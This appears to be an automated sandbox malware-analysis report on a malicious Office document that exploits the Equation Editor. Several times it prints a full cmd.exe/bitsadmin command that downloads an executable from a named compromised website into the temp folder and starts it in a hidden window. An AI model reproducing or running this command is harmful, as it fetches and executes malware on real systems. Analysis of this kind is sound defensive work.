Technical Information
Malicious functions
Executes the following (exploit)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer wk /priority foreground https://www.gorontula.com/wp-admin/includes/_output2011D00.exe %TEMP%\bHy.exe && start %TEMP%\bHy.exe
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{1985d5ff-03cb-4fdb-8831-b01a35d1d990}.tmp
Network activity
Connects to
- 'go###tula.com':443
UDP
- DNS ASK go###tula.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer wk /priority foreground https://www.gorontula.com/wp-admin/includes/_output2011D00.exe %TEMP%\bHy.exe && start %TEMP%\bHy.exe' (with hidden window)
Executes the following
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer wk /priority foreground https://www.gorontula.com/wp-admin/includes/_output2011D00.exe %TEMP%\bHy.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
